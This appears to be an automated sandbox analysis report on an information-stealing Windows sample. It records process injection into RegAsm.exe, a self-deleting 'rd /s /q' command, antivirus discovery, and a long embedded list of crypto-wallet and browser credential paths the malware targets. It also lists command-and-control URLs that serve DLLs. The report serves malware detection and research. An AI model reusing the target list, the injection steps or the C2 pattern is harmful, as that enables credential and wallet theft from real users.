                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02CD018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02CD018D
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004111BE
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF6008Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,3_2_6C8F4760
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7630 cpuid 0_2_006E7630
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006FB00C
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_006FB097
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006FB2EA
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006F2B47
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_006FB413
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006FB519
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_006FB5E8
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006F25E1
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006FAF71
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006FAF26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7A2F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006E7A2F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,3_2_0040FBCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_0040FC92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: \\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara match File source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8B0C40 sqlite3_bind_zeroblob,3_2_6C8B0C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8B0D60 sqlite3_bind_parameter_name,3_2_6C8B0D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7D8EA0 sqlite3_clear_bindings,3_2_6C7D8EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,3_2_6C8B0B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7D6410 bind,WSAGetLastError,3_2_6C7D6410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7D6070 PR_Listen,3_2_6C7D6070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,3_2_6C7DC050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7DC030 sqlite3_bind_parameter_count,3_2_6C7DC030
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Virtualization/Sandbox Evasion | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 511 Process Injection | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph] Behavior Graph ID: 1442218, Sample: file.exe, Startdate: 15/05/2024, Architecture: WINDOWS, Score: 100
Processes: file.exe started RegAsm.exe (two instances) and conhost.exe; the first RegAsm.exe started cmd.exe, which started conhost.exe and timeout.exe.
Network (RegAsm.exe): steamcommunity.com 23.194.234.100, 443, 49730, AKAMAI-ASUS United States; 95.217.240.101, 443, 49731, 49732, HETZNER-ASDE Germany.
Dropped (RegAsm.exe): C:\Users\user\AppData\...\vcruntime140[1].dll, PE32; C:\Users\user\AppData\...\softokn3[1].dll, PE32; C:\Users\user\AppData\Local\...\nss3[1].dll, PE32; 10 other files (none is malicious).

Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | HEUR/AGEN.1317471 |
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\GHIJJEGDBFII\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\GHIJJEGDBFII\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\GHIJJEGDBFII\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\GHIJJEGDBFII\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\GHIJJEGDBFII\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.194.234.100 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://95.217.240.101/nss3.dll | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/freebl3.dll | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/softokn3.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/msvcp140.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/mozglue.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/sqlx.dll | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199686524322 | true | Avira URL Cloud: malware | unknown
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesGDAAKF.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_qRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/about/76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFGCBFBG.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101/msvcp140.dllURegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://95.217.240.101/freebl3.dllsRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://help.steampowered.com/en/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/market/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/news/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.10176561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=JEGHDA.3.drfalse
                    • URL Reputation: safe
                    unknown
                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
